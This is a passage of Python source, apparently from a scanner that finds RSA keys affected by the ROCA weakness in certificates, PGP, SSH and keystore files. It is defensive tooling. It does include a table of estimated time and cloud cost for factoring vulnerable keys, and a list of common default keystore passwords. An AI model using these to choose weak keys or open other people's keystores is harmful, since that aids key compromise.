'POSTAL_CODE', ObjectIdentifier("2.5.4.17")): "ZIP", } ret = [] try: for attribute in subject: oid = attribute.oid dot = oid.dotted_string oid_name = oid_names[oid] if shorten and oid in oid_names else oid._name val = attribute.value ret.append('%s: %s' % (oid_name, val)) except: pass return ', '.join(ret) except Exception as e: logger.warning('Unexpected error: %s' % e) return 'N/A' def utf8ize(x): """ Converts to utf8 if non-empty :param x: :return: """ if x is None: return None return x.encode('utf-8') def startswith(haystack, prefix): """ py3 comp startswith :param haystack: :param prefix: :return: """ if haystack is None: return None if sys.version_info[0] < 3: return haystack.startswith(prefix) return to_bytes(haystack).startswith(to_bytes(prefix)) def to_string(x): """ Utf8 conversion :param x: :return: """ if isinstance(x, bytes): return x.decode('utf-8') if isinstance(x, basestring): return x def to_bytes(x): """ Byte conv :param x: :return: """ if isinstance(x, bytes): return x if isinstance(x, basestring): return x.encode('utf-8') def contains(haystack, needle): """ py3 contains :param haystack: :param needle: :return: """ if sys.version_info[0] < 3: return needle in haystack else: return to_bytes(needle) in to_bytes(haystack) def strip_spaces(x): """ Strips spaces :param x: :return: """ x = x.replace(b' ', b'') x = x.replace(b'\t', b'') return x def strip_pem(x): """ Strips PEM to bare base64 encoded form :param x: :return: """ if x is None: return None x = to_string(x) pem = x.replace('-----BEGIN CERTIFICATE-----', '') pem = pem.replace('-----END CERTIFICATE-----', '') pem = re.sub(r'-----BEGIN .+?-----', '', pem) pem = re.sub(r'-----END .+?-----', '', pem) pem = pem.replace(' ', '') pem = pem.replace('\t', '') pem = pem.replace('\r', '') pem = pem.replace('\n', '') return pem.strip() def pem_to_der(x): """ Converts PEM to DER :param x: :return: """ if x is None: return None pem = strip_pem(x) return base64.b64decode(pem) def unix_time(dt): if dt is None: return None cur = datetime.datetime.utcfromtimestamp(0) if dt.tzinfo is not None: cur.replace(tzinfo=dt.tzinfo) return (dt - cur).total_seconds() class Tracelogger(object): """ Prints traceback to the debugging logger if not shown before """ def __init__(self, logger=None): self.logger = logger self._db = set() def log(self, cause=None, do_message=True, custom_msg=None): """ Loads exception data from the current exception frame - should be called inside the except block :return: """ message = error_message(self, cause=cause) exc_type, exc_value, exc_traceback = sys.exc_info() traceback_formatted = traceback.format_exc() traceback_val = traceback.extract_tb(exc_traceback) md5 = hashlib.md5(traceback_formatted.encode('utf-8')).hexdigest() if md5 in self._db: # self.logger.debug('Exception trace logged: %s' % md5) return if custom_msg is not None and cause is not None: self.logger.debug('%s : %s' % (custom_msg, cause)) elif custom_msg is not None: self.logger.debug(custom_msg) elif cause is not None: self.logger.debug('%s' % cause) self.logger.debug(traceback_formatted) self._db.add(md5) class AutoJSONEncoder(json.JSONEncoder): """ JSON encoder trying to_json() first """ def default(self, obj): try: return obj.to_json() except AttributeError: return self.default_classic(obj) def default_classic(self, o): from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers if isinstance(o, set): return list(o) elif isinstance(o, RSAPublicNumbers): return {'n': o.n, 'e': o.e} else: return super(AutoJSONEncoder, self).default(o) class TestResult(object): """ Fingerprint test result holder. """ def __init__(self, data=None, **kwargs): self._data = collections.OrderedDict(data if data is not None else {}) for key, value in iteritems(kwargs): self._data[key] = value @property def type(self): return defvalkey(self._data, 'type') @property def marked(self): return defvalkey(self._data, 'marked', False) @property def n(self): return defvalkey(self._data, 'n') @property def time_years(self): return defvalkey(self._data, 'time_years') @property def price_aws_c4(self): return defvalkey(self._data, 'price_aws_c4') def __getattr__(self, item): if item in self._data: return self._data[item] return None def to_json(self): self._data['marked'] = self.marked self._data['type'] = self.type return self._data class ImportException(Exception): """Import exception used with optional dependencies""" def __init__(self, message=None, cause=None): super(ImportException, self).__init__(message) class DlogFprint(object): """ Discrete logarithm (dlog) fingerprinter for ROCA. Exploits the mathematical prime structure described in the paper. No external python dependencies are needed (for sake of compatibility). Detection could be optimized using sympy / gmpy but that would add significant dependency overhead. """ def __init__(self, max_prime=167, generator=65537): self.primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167] self.max_prime = max_prime self.generator = generator self.m, self.phi_m = self.primorial(max_prime) self.phi_m_decomposition = DlogFprint.small_factors(self.phi_m, max_prime) self.generator_order = DlogFprint.element_order(generator, self.m, self.phi_m, self.phi_m_decomposition) self.generator_order_decomposition = DlogFprint.small_factors(self.generator_order, max_prime) logger.debug('Dlog fprint data: max prime: %s, generator: %s, m: %s, phi_m: %s, phi_m_dec: %s, ' 'generator_order: %s, generator_order_decomposition: %s' % (self.max_prime, self.generator, self.m, self.phi_m, self.phi_m_decomposition, self.generator_order, self.generator_order_decomposition)) def fprint(self, modulus): """ Returns True if fingerprint is present / detected. :param modulus: :return: """ if modulus <= 2: return False d = DlogFprint.discrete_log(modulus, self.generator, self.generator_order, self.generator_order_decomposition, self.m) return d is not None def primorial(self, max_prime=167): """ Returns primorial (and its totient) with max prime inclusive - product of all primes below the value :param max_prime: :param dummy: :return: primorial, phi(primorial) """ mprime = max(self.primes) if max_prime > mprime: raise ValueError('Current primorial implementation does not support values above %s' % mprime) primorial = 1 phi_primorial = 1 for prime in self.primes: primorial *= prime phi_primorial *= prime - 1 return primorial, phi_primorial @staticmethod def prime3(a): """ Simple trial division prime detection :param a: :return: """ if a < 2: return False if a == 2 or a == 3: return True # manually test 2 and 3 if a % 2 == 0 or a % 3 == 0: return False # exclude multiples of 2 and 3 max_divisor = int(math.ceil(a ** 0.5)) d, i = 5, 2 while d <= max_divisor: if a % d == 0: return False d += i i = 6 - i # this modifies 2 into 4 and vice versa return True @staticmethod def is_prime(a): return DlogFprint.prime3(a) @staticmethod def prime_factors(n, limit=None): """ Simple trial division factorization :param n: :param limit: :return: """ num = [] # add 2, 3 to list or prime factors and remove all even numbers(like sieve of ertosthenes) while n % 2 == 0: num.append(2) n = n // 2 while n % 3 == 0: num.append(3) n = n // 3 max_divisor = int(math.ceil(n ** 0.5)) if limit is None else limit d, i = 5, 2 while d <= max_divisor: while n % d == 0: num.append(d) n = n // d d += i i = 6 - i # this modifies 2 into 4 and vice versa # if no is > 2 i.e no is a prime number that is only divisible by itself add it if n > 2: num.append(n) return num @staticmethod def factor_list_to_map(factors): """ Factor list to map factor -> power :param factors: :return: """ ret = {} for k, g in itertools.groupby(factors): ret[k] = len(list(g)) return ret @staticmethod def element_order(element, modulus, phi_m, phi_m_decomposition): """ Returns order of the element in Zmod(modulus) :param element: :param modulus: :param phi_m: phi(modulus) :param phi_m_decomposition: factorization of phi(modulus) :return: """ if element == 1: return 1 # by definition if pow(element, phi_m, modulus) != 1: return None # not an element of the group order = phi_m for factor, power in list(phi_m_decomposition.items()): for p in range(1, power + 1): next_order = order // factor if pow(element, next_order, modulus) == 1: order = next_order else: break return order @staticmethod def chinese_remainder(n, a): """ Solves CRT for moduli and remainders :param n: :param a: :return: """ sum = 0 prod = reduce(lambda a, b: a * b, n) for n_i, a_i in zip(n, a): p = prod // n_i sum += a_i * DlogFprint.mul_inv(p, n_i) * p return sum % prod @staticmethod def mul_inv(a, b): """ Modular inversion a mod b :param a: :param b: :return: """ b0 = b x0, x1 = 0, 1 if b == 1: return 1 while a > 1: q = a // b a, b = b, a % b x0, x1 = x1 - q * x0, x0 if x1 < 0: x1 += b0 return x1 @staticmethod def small_factors(x, max_prime): """ Factorizing x up to max_prime limit. :param x: :param max_prime: :return: """ factors = DlogFprint.prime_factors(x, limit=max_prime) return DlogFprint.factor_list_to_map(factors) @staticmethod def discrete_log(element, generator, generator_order, generator_order_decomposition, modulus): """ Simple discrete logarithm :param element: :param generator: :param generator_order: :param generator_order_decomposition: :param modulus: :return: """ if pow(element, generator_order, modulus) != 1: # logger.debug('Powmod not one') return None moduli = [] remainders = [] for prime, power in list(generator_order_decomposition.items()): prime_to_power = prime ** power order_div_prime_power = generator_order // prime_to_power # g.div(generator_order, prime_to_power) g_dash = pow(generator, order_div_prime_power, modulus) h_dash = pow(element, order_div_prime_power, modulus) found = False for i in range(0, prime_to_power): if pow(g_dash, i, modulus) == h_dash: remainders.append(i) moduli.append(prime_to_power) found = True break if not found: # logger.debug('Not found :(') return None ccrt = DlogFprint.chinese_remainder(moduli, remainders) return ccrt # # Main fingerprinting tool # class RocaFingerprinter(object): """ Key fingerprinter """ def __init__(self, **kwargs): self.args = None self.trace_logger = Tracelogger(logger) self.jks_passwords = ['', 'changeit', 'chageit', 'root', 'server', 'test', 'alias', 'jks', 'tomcat', 'www', 'web', 'https'] kwargs.setdefault('do_print', False) self.jks_file_passwords = kwargs.get('jks_file_passwords') self.do_print = kwargs.get('do_print') # Minimal modulo size to avoid false positives on the random data and very short moduli kwargs.setdefault('minimal_modulus_bits', 256) kwargs.setdefault('minimal_modulus', 2**kwargs.get('minimal_modulus_bits')) self.minimal_modulus_bits = kwargs.get('minimal_modulus_bits') self.minimal_modulus = kwargs.get('minimal_modulus') self.tested = 0 self.num_rsa = 0 self.num_pem_certs = 0 self.num_pem_csr = 0 self.num_der_certs = 0 self.num_rsa_keys = 0 self.num_pgp_masters = 0 self.num_pgp_total = 0 self.num_ssh = 0 self.num_json = 0 self.num_apk = 0 self.num_ldiff_cert = 0 self.num_jks_cert = 0 self.num_pkcs7_cert = 0 self.found = 0 self.dlog_fprinter = DlogFprint() self.primes = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167] self.prints = [6, 30, 126, 1026, 5658, 107286, 199410, 8388606, 536870910, 2147483646, 67109890, 2199023255550, 8796093022206, 140737488355326, 5310023542746834, 576460752303423486, 1455791217086302986, 147573952589676412926, 20052041432995567486, 6041388139249378920330, 207530445072488465666, 9671406556917033397649406, 618970019642690137449562110, 79228162521181866724264247298, 2535301200456458802993406410750, 1760368345969468176824550810518, 50079290986288516948354744811034, 473022961816146413042658758988474, 10384593717069655257060992658440190, 144390480366845522447407333004847678774, 2722258935367507707706996859454145691646, 174224571863520493293247799005065324265470, 696898287454081973172991196020261297061886, 713623846352979940529142984724747568191373310, 1800793591454480341970779146165214289059119882, 126304807362733370595828809000324029340048915994, 11692013098647223345629478661730264157247460343806, 187072209578355573530071658587684226515959365500926] self.length_to_time_years = { 512: 0.000220562038803, 544: 0.00147111662211, 576: 0.00673857391044, 608: 0.0618100348655, 640: 0.281991193891, 672: 4.17998973277, 704: 39.5102151646, 736: 3473.56982013, 768: 342674.912512, 800: 89394704.8817, 832: 8359663659.84, 864: 44184838761000.0, 896: -1, 928: -1, 960: -1, 992: 0.0658249816453, 1024: 0.266074841608, 1056: 1.28258930217, 1088: 7.38296771318, 1120: 20.2173702373, 1152: 58.9125352286, 1184: 415.827799825, 1216: 1536.17130832, 1248: 5415.49876704, 1280: 46281.7555548, 1312: 208675.856834, 1344: 1586124.1447, 1376: 13481048.41, 1408: 102251985.84, 1440: 1520923586.93, 1472: 30924687905.9, 1504: 1933367534430.0, 1536: 135663316837000.0, 1568: 7582543380680000.0, 1600: 5.1035570593e+17, 1632: 3.8899705405e+19, 1664: 3.66527648803e+21, 1696: 3.77984169396e+23, 1728: 5.14819714267e+25, 1760: 6.24593092623e+27, 1792: 8.73499845222e+29, 1824: 1.87621309001e+32, 1856: 2.9671795418e+34, 1888: -1, 1920: -1, 1952: -1, 1984: 28.6856385392, 2016: 60.644701708, 2048: 140.849490658, 2080: 269.272545592, 2112: 724.550220558, 2144: 1262.66048991, 2176: 3833.6903835, 2208: 7049.61288162, 2240: 14511.7355032, 2272: 41968.716653, 2304: 105863.580849, 2336: 509819.310451, 2368: 863135.14224, 2400: 3730089.12073, 2432: 14337269.1935, 2464: 55914941.3902, 2496: 144036102.003, 2528: 972239354.935, 2560: 1732510677.27, 2592: 10345329708.8, 2624: 72172778459.7, 2656: 386464106155.0, 2688: 1706310772440.0, 2720: 14920435519400.0, 2752: 77755063482200.0, 2784: 1237655413740000.0, 2816: 7524587305980000.0, 2848: 4.66421299974e+16, 2880: 5.41036780376e+17, 2912: 6.07066413463e+18, 2944: 6.17088797501e+19, 2976: 4.35440413514e+20, 3008: 1.04496910207e+22, 3040: 2.91790333753e+23, 3072: 2.84373206239e+25, 3104: 1.21552661668e+27, 3136: 1.14739892383e+29, 3168: 7.03739127786e+30, 3200: 5.5123347741e+32, 3232: 5.46349546772e+34, 3264: 3.07923071536e+36, 3296: 4.88872482194e+37, 3328: 4.74614877952e+39, 3360: 5.94743522012e+41, 3392: 3.63042884553e+43, 3424: 3.15382165869e+45, 3456: 4.22631927496e+47, 3488: 4.57325850696e+50, 3520: 7.58105156459e+52, 3552: 8.44988925164e+54, 3584: 2.1141023018e+57, 3616: 2.95898599696e+59, 3648: 7.23723533e+61, 3680: 6.0951282339e+62, 3712: 1.06824345519e+65, 3744: 1.85662696289e+67, 3776: 5.64628786015e+69, 3808: 1.38273039654e+72, 3840: -1, 3872: -1, 3904: -1, 3936: -1, 3968: 47950588.0004, 4000: 134211454.052, 4032: 201770331.337, 4064: 613149724.539, 4096: 1283252196.93, } # args init parser = self.init_parser() self.args = parser.parse_args(args=[]) def is_acceptable_modulus(self, modulus): """ Tests if modulus isn't too small :param modulus: :return: """ return not self.minimal_modulus or modulus >= self.minimal_modulus def has_fingerprint_moduli(self, modulus): """ Returns true if the fingerprint was detected in the key :param modulus: :return: """ if not self.is_acceptable_modulus(modulus): return False self.tested += 1 for i in range(0, len(self.primes)): if (1 << (modulus % self.primes[i])) & self.prints[i] == 0: return False self.found += 1 return True def has_fingerprint_dlog(self, modulus): """ Exact fingerprint using mathematical structure of the primes :param modulus: :return: """ if not self.is_acceptable_modulus(modulus): return False self.tested += 1 positive = self.dlog_fprinter.fprint(modulus) if positive: self.found += 1 return positive def switch_fingerprint_method(self, old=False): """ Switches main fingerprinting method. :param old: if True old fingerprinting method will be used. :return: """ if old: self.has_fingerprint = self.has_fingerprint_moduli else: self.has_fingerprint = self.has_fingerprint_dlog has_fingerprint_real = has_fingerprint_moduli has_fingerprint = has_fingerprint_dlog def mark_and_add_effort(self, modulus, json_info): """ Inserts factorization effort for vulnerable modulus into json_info :param modulus: :param json_info: :return: """ META_AMZ_FACT = 92. / 152. # conversion from university cluster to AWS AMZ_C4_PRICE = 0.1 # price of 2 AWS CPUs per hour length = int(ceil(log(modulus, 2))) length_ceiling = int(ceil(length / 32)) * 32 if length_ceiling in self.length_to_time_years: effort_time = self.length_to_time_years[length_ceiling] else: effort_time = -1 if effort_time > 0: effort_time *= META_AMZ_FACT # scaling to more powerful AWS CPU effort_price = effort_time * 365.25 * 24 * 0.5 * AMZ_C4_PRICE else: effort_price = -1 json_info['marked'] = True json_info['time_years'] = effort_time json_info['price_aws_c4'] = effort_price return json_info def file_matches_extensions(self, fname, extensions): """ True if file matches one of extensions :param fname: :param extensions: :return: """ if not isinstance(extensions, list): extensions = [extensions] for ext in extensions: if fname.endswith('.%s' % ext): return True return False def process_inputs(self): """ Processes input data :return: """ ret = [] files = self.args.files if files is None: return ret for fname in files: if fname == '-': if self.args.base64stdin: for line in sys.stdin: data = base64.b64decode(line) ret.append(self.process_file(data, fname)) continue else: fh = sys.stdin elif fname.endswith('.tar') or fname.endswith('.tar.gz'): sub = self.process_tar(fname) ret.append(sub) continue elif not os.path.isfile(fname): sub = self.process_dir(fname) ret.append(sub) continue else: fh = open(fname, 'rb') with fh: data = fh.read() sub = self.process_file(data, fname) ret.append(sub) return ret def process_tar(self, fname): """ Tar(gz) archive processing :param fname: :return: """ import tarfile # lazy import, only when needed ret = [] with tarfile.open(fname) as tr: members = tr.getmembers() for member in members: if not member.isfile(): continue fh = tr.extractfile(member) sub = self.process_file(fh.read(), member.name) ret.append(sub) return ret def process_dir(self, dirname): """ Directory processing :param dirname: :return: """ ret = [] sub_rec = [f for f in os.listdir(dirname)] for fname in sub_rec: full_path = os.path.join(dirname, fname) if os.path.isfile(full_path): with open(full_path, 'rb') as fh: sub = self.process_file(fh.read(), fname) ret.append(sub) elif os.path.isdir(full_path): sub = self.process_dir(full_path) ret.append(sub) return ret def process_file(self, data, name): """ Processes a single file :param data: :param name: :return: """ try: return self.process_file_autodetect(data, name) except Exception as e: logger.debug('Exception processing file %s : %s' % (name, e)) self.trace_logger.log(e) # autodetection fallback - all formats ret = [] logger.debug('processing %s as PEM' % name) ret.append(self.process_pem(data, name)) logger.debug('processing %s as DER' % name) ret.append(self.process_der(data, name)) logger.debug('processing %s as PGP' % name) ret.append(self.process_pgp(data, name)) logger.debug('processing %s as SSH' % name) ret.append(self.process_ssh(data, name)) logger.debug('processing %s as JSON' % name) ret.append(self.process_json(data, name)) logger.debug('processing %s as APK' % name) ret.append(self.process_apk(data, name)) logger.debug('processing %s as MOD' % name) ret.append(self.process_mod(data, name)) logger.debug('processing %s as LDIFF' % name) ret.append(self.process_ldiff(data, name)) logger.debug('processing %s as JKS' % name) ret.append(self.process_jks(data, name)) logger.debug('processing %s as PKCS7' % name) ret.append(self.process_pkcs7(data, name)) return ret def process_file_autodetect(self, data, name): """ Processes a single file - format autodetection :param data: :param name: :return: """ is_ssh_file = startswith(data, 'ssh-rsa') or contains(data, 'ssh-rsa ') is_pgp_file = startswith(data, '-----BEGIN PGP') is_pkcs7_file = startswith(data, '-----BEGIN PKCS7') is_pem_file = startswith(data, '-----BEGIN') and not is_pgp_file is_ldiff_file = contains(data, 'binary::') is_pgp = is_pgp_file or (self.file_matches_extensions(name, ['pgp', 'gpg', 'key', 'pub', 'asc']) and not is_ssh_file and not is_pem_file) is_pgp |= self.args.file_pgp is_crt_ext = self.file_matches_extensions(name, ['der', 'crt', 'cer', 'cert', 'x509', 'key', 'pub', 'ca']) is_pem = self.file_matches_extensions(name, 'pem') or is_pem_file is_pem |= self.args.file_pem is_der = not is_pem and not is_ssh_file and not is_pgp_file and is_crt_ext is_der |= self.args.file_der is_ssh = self.file_matches_extensions(name, ['ssh', 'pub']) or is_ssh_file is_ssh |= self.args.file_ssh is_apk = self.file_matches_extensions(name, 'apk') is_mod = self.file_matches_extensions(name, ['txt', 'mod', 'mods', 'moduli']) is_mod |= not is_pem and not is_der and not is_pgp and not is_ssh_file and not is_apk is_mod |= self.args.file_mod is_json = self.file_matches_extensions(name, ['json', 'js']) or startswith(data, '{') or startswith(data, '[') is_json |= self.args.file_json is_ldiff = self.file_matches_extensions(name, ['ldiff', 'ldap']) or is_ldiff_file is_ldiff |= self.args.file_ldiff is_jks = self.file_matches_extensions(name, ['jks', 'bks']) is_pkcs7 = self.file_matches_extensions(name, ['pkcs7', 'p7s', 'p7']) is_pkcs7 |= is_pkcs7_file is_pkcs7 |= self.args.file_pkcs7 det = is_pem or is_der or is_pgp or is_ssh or is_mod or is_json or is_apk or is_ldiff or is_jks ret = [] if is_pem: logger.debug('processing %s as PEM' % name) ret.append(self.process_pem(data, name)) if is_der: logger.debug('processing %s as DER' % name) ret.append(self.process_der(data, name)) if is_pgp: logger.debug('processing %s as PGP' % name) ret.append(self.process_pgp(data, name)) if is_ssh: logger.debug('processing %s as SSH' % name) ret.append(self.process_ssh(data, name)) if is_json: logger.debug('processing %s as JSON' % name) ret.append(self.process_json(data, name)) if is_apk: logger.debug('processing %s as APK' % name) ret.append(self.process_apk(data, name)) if is_mod: logger.debug('processing %s as MOD' % name) ret.append(self.process_mod(data, name)) if is_ldiff: logger.debug('processing %s as LDIFF' % name) ret.append(self.process_ldiff(data, name)) if is_jks: logger.debug('processing %s as JKS' % name) ret.append(self.process_jks(data, name)) if is_pkcs7: logger.debug('processing %s as PKCS7' % name) ret.append(self.process_pkcs7(data, name)) if not det: logger.debug('Undetected (skipped) file: %s' % name) return ret def process_pem(self, data, name): """ PEM processing - splitting further by the type of the records :param data: :param name: :return: """ try: ret = [] data = to_string(data) parts = re.split(r'-----BEGIN', data) if len(parts) == 0: return None if len(parts[0]) == 0: parts.pop(0) crt_arr = ['-----BEGIN' + x for x in parts] for idx, pem_rec in enumerate(crt_arr): pem_rec = pem_rec.strip() if len(pem_rec) == 0: continue if startswith(pem_rec, '-----BEGIN CERTIFICATE REQUEST'): return self.process_pem_csr(pem_rec, name, idx) elif startswith(pem_rec, '-----BEGIN CERTIF'): return self.process_pem_cert(pem_rec, name, idx) elif startswith(pem_rec, '-----BEGIN '): # fallback return self.process_pem_rsakey(pem_rec, name, idx) return ret except Exception as e: logger.debug('Exception processing PEM file %s : %s' % (name, e)) self.trace_logger.log(e) return None def process_pem_cert(self, data, name, idx): """ Processes PEM encoded certificate :param data: :param name: :param idx: :return: """ from cryptography.x509.base import load_der_x509_certificate try: x509 = load_der_x509_certificate(pem_to_der(data), self.get_backend()) self.num_pem_certs += 1 return self.process_x509(x509, name=name, idx=idx, data=data, pem=True, source='pem-cert') except Exception as e: logger.debug('PEM processing failed: %s' % e) self.trace_logger.log(e) def process_pem_csr(self, data, name, idx): """ Processes PEM encoded certificate request PKCS#10 :param data: :param name: :param idx: :return: """ from cryptography.x509.base import load_der_x509_csr try: csr = load_der_x509_csr(pem_to_der(data), self.get_backend()) self.num_pem_csr += 1 return self.process_csr(csr, name=name, idx=idx, data=data, pem=True, source='pem-csr') except Exception as e: logger.debug('PEM processing failed: %s' % e) self.trace_logger.log(e) def process_pem_rsakey(self, data, name, idx): """ Processes PEM encoded RSA key :param data: :param name: :param idx: :return: """ from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key try: if startswith(data, '-----BEGIN RSA PUBLIC KEY') or startswith(data, '-----BEGIN PUBLIC KEY'): rsa = load_der_public_key(pem_to_der(data), self.get_backend()) public_numbers = rsa.public_numbers() elif startswith(data, '-----BEGIN RSA PRIVATE KEY') or startswith(data, '-----BEGIN PRIVATE KEY'): rsa = load_der_private_key(pem_to_der(data), None, self.get_backend()) public_numbers = rsa.private_numbers().public_numbers else: return None self.num_rsa_keys += 1 self.num_rsa += 1 js = collections.OrderedDict() js['type'] = 'pem-rsa-key' js['fname'] = name js['idx'] = idx js['pem'] = data js['e'] = '0x%x' % public_numbers.e js['n'] = '0x%x' % public_numbers.n if self.has_fingerprint(public_numbers.n): logger.warning('Fingerprint found in PEM RSA key %s ' % name) self.mark_and_add_effort(public_numbers.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) except Exception as e: logger.debug('Pubkey loading error: %s : %s [%s] : %s' % (name, idx, data[:20], e)) self.trace_logger.log(e) def process_der(self, data, name): """ DER processing :param data: :param name: :return: """ from cryptography.x509.base import load_der_x509_certificate try: x509 = load_der_x509_certificate(data, self.get_backend()) self.num_der_certs += 1 return self.process_x509(x509, name=name, pem=False, source='der-cert') except Exception as e: logger.debug('DER processing failed: %s : %s' % (name, e)) self.trace_logger.log(e) def process_x509(self, x509, name, idx=None, data=None, pem=True, source='', aux=None): """ Processing parsed X509 certificate :param x509: :param name: :param idx: :param data: :param pem: :param source: :param aux: :return: """ if x509 is None: return from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey from cryptography.x509.oid import NameOID pub = x509.public_key() if not isinstance(pub, RSAPublicKey): return self.num_rsa += 1 pubnum = x509.public_key().public_numbers() js = collections.OrderedDict() js['type'] = source js['fname'] = name js['idx'] = idx js['fprint'] = binascii.hexlify(x509.fingerprint(hashes.SHA256())) js['subject'] = utf8ize(try_get_dn_string(x509.subject, shorten=True)) js['issuer'] = utf8ize(try_get_dn_string(x509.issuer, shorten=True)) js['issuer_org'] = utf8ize(try_get_dn_part(x509.issuer, NameOID.ORGANIZATION_NAME)) js['created_at'] = self.strtime(x509.not_valid_before) js['created_at_utc'] = unix_time(x509.not_valid_before) js['not_valid_after_utc'] = unix_time(x509.not_valid_after) js['pem'] = data if pem else None js['aux'] = aux js['e'] = '0x%x' % pubnum.e js['n'] = '0x%x' % pubnum.n if self.has_fingerprint(pubnum.n): logger.warning('Fingerprint found in the Certificate %s idx %s ' % (name, idx)) self.mark_and_add_effort(pubnum.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) def process_csr(self, csr, name, idx=None, data=None, pem=True, source='', aux=None): """ Processing parsed X509 csr :param csr: :type csr: cryptography.x509.CertificateSigningRequest :param name: :param idx: :param data: :param pem: :param source: :param aux: :return: """ if csr is None: return from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey pub = csr.public_key() if not isinstance(pub, RSAPublicKey): return self.num_rsa += 1 pubnum = csr.public_key().public_numbers() js = collections.OrderedDict() js['type'] = source js['fname'] = name js['idx'] = idx js['subject'] = utf8ize(try_get_dn_string(csr.subject, shorten=True)) js['pem'] = data if pem else None js['aux'] = aux js['e'] = '0x%x' % pubnum.e js['n'] = '0x%x' % pubnum.n if self.has_fingerprint(pubnum.n): logger.warning('Fingerprint found in the CSR %s idx %s ' % (name, idx)) self.mark_and_add_effort(pubnum.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) def process_pgp(self, data, name): """ PGP key processing :param data: :param name: :return: """ ret = [] try: data = to_string(data) parts = re.split(r'-{5,}BEGIN', data) if len(parts) == 0: return if len(parts[0]) == 0: parts.pop(0) crt_arr = ['-----BEGIN' + x for x in parts] for idx, pem_rec in enumerate(crt_arr): try: pem_rec = pem_rec.strip() if len(pem_rec) == 0: continue ret.append(self.process_pgp_raw(pem_rec.encode(), name, idx)) except Exception as e: logger.error('Exception in processing PGP rec file %s: %s' % (name, e)) self.trace_logger.log(e) except Exception as e: logger.error('Exception in processing PGP file %s: %s' % (name, e)) self.trace_logger.log(e) return ret def process_pgp_raw(self, data, name, file_idx=None): """ Processes single PGP key :param data: file data :param name: file name :param file_idx: index in the file :return: """ try: from pgpdump.data import AsciiData from pgpdump.packet import SignaturePacket, PublicKeyPacket, PublicSubkeyPacket, UserIDPacket except Exception as e: logger.warning('Could not import pgpdump, try running: pip install pgpdump') return [TestResult(fname=name, type='pgp', error='cannot-import')] ret = [] js_base = collections.OrderedDict() pgp_key_data = AsciiData(data) packets = list(pgp_key_data.packets()) self.num_pgp_masters += 1 master_fprint = None master_key_id = None identities = [] pubkeys = [] sign_key_ids = [] sig_cnt = 0 for idx, packet in enumerate(packets): if isinstance(packet, PublicKeyPacket): master_fprint = packet.fingerprint master_key_id = format_pgp_key(packet.key_id) pubkeys.append(packet) elif isinstance(packet, PublicSubkeyPacket): pubkeys.append(packet) elif isinstance(packet, UserIDPacket): identities.append(packet) elif isinstance(packet, SignaturePacket): sign_key_ids.append(packet.key_id) sig_cnt += 1 # Names / identities ids_arr = [] identity = None for packet in identities: idjs = collections.OrderedDict() idjs['name'] = packet.user_name idjs['email'] = packet.user_email ids_arr.append(idjs) if identity is None: identity = '%s <%s>' % (packet.user_name, packet.user_email) js_base['type'] = 'pgp' js_base['fname'] = name js_base['fname_idx'] = file_idx js_base['master_key_id'] = master_key_id js_base['master_fprint'] = master_fprint js_base['identities'] = ids_arr js_base['signatures_count'] = sig_cnt js_base['packets_count'] = len(packets) js_base['keys_count'] = len(pubkeys) js_base['signature_keys'] = list(set(sign_key_ids)) # Public keys processing for packet in pubkeys: try: self.num_pgp_total += 1 if packet.modulus is None: continue self.num_rsa += 1 js = collections.OrderedDict(js_base) js['created_at'] = self.strtime(packet.creation_time) js['created_at_utc'] = unix_time(packet.creation_time) js['is_master'] = master_fprint == packet.fingerprint js['kid'] = format_pgp_key(packet.key_id) js['bitsize'] = packet.modulus_bitlen js['master_kid'] = master_key_id js['e'] = '0x%x' % packet.exponent js['n'] = '0x%x' % packet.modulus if self.has_fingerprint(packet.modulus): self.mark_and_add_effort(packet.modulus, js) logger.warning('Fingerprint found in PGP key %s key ID 0x%s' % (name, js['kid'])) if self.do_print: print(json.dumps(js)) ret.append(TestResult(js)) except Exception as e: logger.error('Excetion in processing the key: %s' % e) self.trace_logger.log(e) return ret def process_ssh(self, data, name): """ Processes SSH keys :param data: :param name: :return: """ if data is None or len(data) == 0: return ret = [] try: lines = [x.strip() for x in data.split(b'\n')] for idx, line in enumerate(lines): ret.append(self.process_ssh_line(line, name, idx)) except Exception as e: logger.debug('Exception in processing SSH public key %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_ssh_line(self, data, name, idx): """ Processes single SSH key :param data: :param name: :param idx: :return: """ data = data.strip() if not contains(data, 'ssh-rsa'): return # strip ssh params / adjustments try: data = data[to_bytes(data).find(b'ssh-rsa'):] except Exception as e: pass from cryptography.hazmat.primitives.serialization import load_ssh_public_key from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey try: key_obj = load_ssh_public_key(data, self.get_backend()) self.num_ssh += 1 if not isinstance(key_obj, RSAPublicKey): return self.num_rsa += 1 numbers = key_obj.public_numbers() js = collections.OrderedDict() js['type'] = 'ssh-rsa' js['fname'] = name js['idx'] = idx js['e'] = '0x%x' % numbers.e js['n'] = '0x%x' % numbers.n js['ssh'] = data if self.has_fingerprint(numbers.n): logger.warning('Fingerprint found in the SSH key %s idx %s ' % (name, idx)) self.mark_and_add_effort(numbers.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) except Exception as e: logger.debug('Exception in processing SSH public key %s idx %s : %s' % (name, idx, e)) self.trace_logger.log(e) def process_json(self, data, name): """ Processes as a JSON :param data: :param name: :return: """ if data is None or len(data) == 0: return ret = [] try: lines = [x.strip() for x in data.split(bytes(b'\n'))] for idx, line in enumerate(lines): ret.append(self.process_json_line(line, name, idx)) except Exception as e: logger.debug('Exception in processing JSON %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_json_line(self, data, name, idx): """ Processes single json line :param data: :param name: :param idx: :return: """ data = data.strip() if len(data) == 0: return ret = [] try: js = 